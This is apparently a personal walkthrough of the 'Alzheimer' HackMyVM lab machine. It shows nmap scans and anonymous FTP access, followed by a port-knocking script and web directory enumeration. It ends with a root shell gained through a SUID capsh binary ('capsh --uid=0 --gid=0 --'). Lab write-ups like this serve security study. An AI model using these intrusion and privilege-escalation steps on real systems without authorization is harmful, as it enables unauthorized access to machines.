HMV Alzheimer
This is a Linux machine with only FTP service enabled at first. And then SSH and Web services will
open after I knock ports from the secrets which leak by FTP. After that I obtain the user name from
web secret and the password for that user within the FTP hidden file, with this credential, I gain
an initial foothold on the system.
Then I find a special executable(capsh) with SUID bit set, which could be exploited to get the root shell.
Summary
Scope
- Name: Alzheimer
- Difficulty: Easy
- OS: Linux
- IP: Local VM
Learned
][Port Knocking is interesting for controlling the behavior of services]]
Enumeration
Nmap
Overall
# Nmap 7.98 scan initiated Sat Mar 7 16:42:13 2026 as: nmap -p- --min-rate 3000 -oN overall 192.168.1.147 Nmap scan report for alzheimer (192.168.1.147) Host is up (0.00015s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 21/tcp open ftp 22/tcp filtered ssh 80/tcp filtered http MAC Address: 08:00:27:73:6C:BF (Oracle VirtualBox virtual NIC) # Nmap done at Sat Mar 7 16:42:14 2026 -- 1 IP address (1 host up) scanned in 0.74 seconds
Detail
# Nmap 7.98 scan initiated Sat Mar 7 16:41:18 2026 as: nmap -sC -sV -O -vv -p21,22,80 -oN detail 192.168.1.147 Nmap scan report for alzheimer (192.168.1.147) Host is up, received arp-response (0.00047s latency). Scanned at 2026-03-07 16:41:18 CST for 4s PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 64 vsftpd 3.0.3 | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.1.33 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 22/tcp filtered ssh no-response 80/tcp filtered http no-response MAC Address: 08:00:27:73:6C:BF (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) TCP/IP fingerprint: OS:SCAN(V=7.98%E=4%D=3/7%OT=21%CT=%CU=42127%PV=Y%DS=1%DC=D%G=N%M=080027%TM= OS:69ABE4B2%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=106%TI=Z%CI=Z%II=I%T OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5= OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=F OS:E88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0% OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S= OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R= OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N% OS:T=40%CD=S) Uptime guess: 1.070 days (since Fri Mar 6 15:00:07 2026) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=263 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Unix Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Mar 7 16:41:22 2026 -- 1 IP address (1 host up) scanned in 3.64 seconds
FTP
FTP is the only service I could access currently, and it allow anonymous login.
❰curtain❙~/workspace/shooting/hmvm/alzheimer❱✔≻ ftp [email protected] Connected to 192.168.1.147. 220 (vsFTPd 3.0.3) 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ftp> ls -al 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 113 4096 Oct 03 2020 . drwxr-xr-x 2 0 113 4096 Oct 03 2020 .. -rw-r--r-- 1 0 0 70 Oct 03 2020 .secretnote.txt 226 Directory send OK. ftp> binary 200 Switching to Binary mode. ftp> get .secretnote.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for .secretnote.txt (70 bytes). 226 Transfer complete. 70 bytes received in 0.0009 seconds (73.3553 kbytes/s)
The secret hints us to knocking these thress ports one by one.
❰curtain❙~/workspace/shooting/hmvm/alzheimer❱✔≻ cat secretnote.txt I need to knock this ports and one door will be open! 1000 2000 3000
I am not familiar with Port Knocking before, after some search with Google I get this useful page from ArchWiki.
#!/bin/bash
HOST=$1
shift
for ARG in "$@"
do
nmap -Pn --host-timeout 100 --max-retries 0 -p $ARG $HOST
done
The SSH and Web services will open after knocking.
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-07 16:49 +0800 Nmap scan report for alzheimer (192.168.1.147) Host is up (0.0013s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http
Web
Then I obtain the user medusa from homepage of web, and his password store into a .txt file.
❰curtain❙~/workspace/shooting/hmvm/alzheimer❱✔≻ cat index.html I dont remember where I stored my password :( I only remember that was into a .txt file... -medusa <!---. --- - .... .. -. --. -->
And the comment seems include a morse code. I decode with a tool that I write and get 'NOTHING'.
❰curtain❙~/workspace/shooting/hmvm/alzheimer❱✔≻ echo '-. --- - .... .. -. --.' | morsecode -d NOTHING
Then I enumerate this service by feroxbuster and get some interesting clues.
404 GET 7l 12w 169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 200 GET 5l 27w 132c http://192.168.1.147/ 301 GET 7l 12w 185c http://192.168.1.147/admin => http://192.168.1.147/admin/ 301 GET 7l 12w 185c http://192.168.1.147/home => http://192.168.1.147/home/ 301 GET 7l 12w 185c http://192.168.1.147/secret => http://192.168.1.147/secret/ 200 GET 2l 7w 34c http://192.168.1.147/home/index.html 301 GET 7l 12w 185c http://192.168.1.147/secret/home => http://192.168.1.147/secret/home/ 200 GET 1l 8w 44c http://192.168.1.147/secret/index.html 200 GET 2l 13w 62c http://192.168.1.147/secret/home/index.html ❰curtain❙~/workspace/shooting/hmvm/alzheimer❱✔≻ curl -L http://192.168.1.147/home Maybe my pass is at home! -medusa ❰curtain❙~/workspace/shooting/hmvm/alzheimer❱✔≻ curl -L http://192.168.1.147/secret Maybe my password is in this secret folder? ❰curtain❙~/workspace/shooting/hmvm/alzheimer❱✔≻ curl -L http://192.168.1.147/secret/home Im trying a lot. Im sure that i will recover my pass! -medusa
Seems like there is no password leaks by web service. Then I goto FTP service again, since it may be
changed after port_knocking. Fortunately, I am right, the hidden file leaks by it include the
password of user medusa.
❰curtain❙~/workspace/shooting/hmvm/alzheimer❱✔≻ cat .secretnote.txt I need to knock this ports and one door will be open! 1000 2000 3000 Iha*******************
Privilege Escalation
The special binary capsh and id stands out after I find the SUID program of system.
medusa@alzheimer:~$ cat /etc/passwd | grep 'sh$'
root:x:0:0:root:/root:/bin/bash
medusa:x:1000:1000:medusa,,,:/home/medusa:/bin/bash
medusa@alzheimer:~$ id
uid=1000(medusa) gid=1000(medusa) groups=1000(medusa),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
medusa@alzheimer:~$ sudo -l
Matching Defaults entries for medusa on alzheimer:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User medusa may run the following commands on alzheimer:
(ALL) NOPASSWD: /bin/id
medusa@alzheimer:~$ crontab -l
no crontab for medusa
medusa@alzheimer:~$ uname -a
Linux alzheimer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
medusa@alzheimer:~$ cat /etc/issue
Debian GNU/Linux 10 \n \l
medusa@alzheimer:~$ find / -mount -perm -u=s 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/sbin/capsh
We can run /bin/id with root, Unfortunately, id can not be exploited. the later one can.
https://gtfobins.org/gtfobins/capsh/
I get a root shell by that.
medusa@alzheimer:~$ /usr/sbin/capsh --uid=0 --gid=0 -- root@alzheimer:~# id uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(medusa)
Read other posts